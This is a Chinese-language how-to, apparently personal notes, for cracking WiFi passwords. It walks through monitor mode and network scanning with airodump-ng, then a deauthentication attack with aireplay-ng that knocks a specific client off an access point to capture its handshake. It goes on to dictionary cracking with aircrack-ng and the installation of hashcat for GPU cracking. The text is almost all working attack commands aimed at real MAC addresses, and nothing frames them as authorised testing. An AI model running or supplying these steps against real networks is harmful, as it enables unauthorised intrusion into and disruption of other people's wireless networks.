打开网卡:sudo ifconfig wlp2s0 up
关闭网卡:sudo ifconfig wlp2s0 down
查看网卡状态:ifconfig
网络重启:sudo service network-manager restart
扫描网络:
iw list:命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。
开启无线网卡的监控模式:airmon-ng start wlp2s0
执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。
查看wifi网络:airodump-ng -w result wlp2s0mon
上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。按Ctrl-C结束。详细信息放在result.csv中
结束无线网卡的监控模式:airmon-ng stop wlan0mon
扫描附近的WiFi得到如下结果:
BSSID:无线AP的Mac地址
PWR:WiFi的信号强度绝对值越小信号越强,如果有部分客户端PWR的值为-1则不在当前网卡能监听到的范围内但是能捕获到AP发往客户端的数据
date:捕获到的数据分组的数量
CH:WiFi的信道,为了减少网络之间的干扰将信道分为14个,但是第14信道不使用
MB:网络的最大速度
ENC:加密算法体系有WEP,WPA,WPA2,OPN(开放)
ESSID:简单理解为WiFi的名称
STATION:连接该网络客户端的Mac地址
抓包:sudo airodump-ng -c 6 --bssid 20:DC:E6:BC:AC:A2 -w rrrr wlp2s0mon
强制客户端重连:
sudo aireplay-ng -0 100 -a 20:DC:E6:BC:AC:A2 -c 4C:49:E3:FF:8A:85 wlp2s0mon
-0 100:表示使用Deauth攻击模式,后面的100表示攻击次数
-a :表示AP的Mac地址
-c :表示客户端的Mac地址
wlp2s0mon:网卡
解包:aircrack-ng -a2 -b 20:DC:E6:BC:AC:A2 -w '/home/heroonehy/桌面/一千四百万密码字典.txt' '/home/heroonehy/rrrr-01.cap'
安装hashcat:
使用显卡的运算能力,
如果你有一个强大的GPU,为什么不使用GPU跑字典呢?
Hashcat可以借助GPU的运算力破解各种不同算法的hash值。
wget https://hashcat.net/files/hashcat-5.0.0.7z
apt-get install -y p7zip
p7zip -d hashcat-5.0.0.7z
cd hashcat-5.0.0/
cp hashcat32.bin /usr/bin/
ln -s /usr/bin/hashcat32.bin /usr/bin/hashcat
解决 没有那个文件或目录 的方法:
原因很简单,是因为他没有32位的运行库 ia32-libs 会出这种八杆子打不着的奇怪提示
sudo apt-get install lib32ncurses5 lib32z1
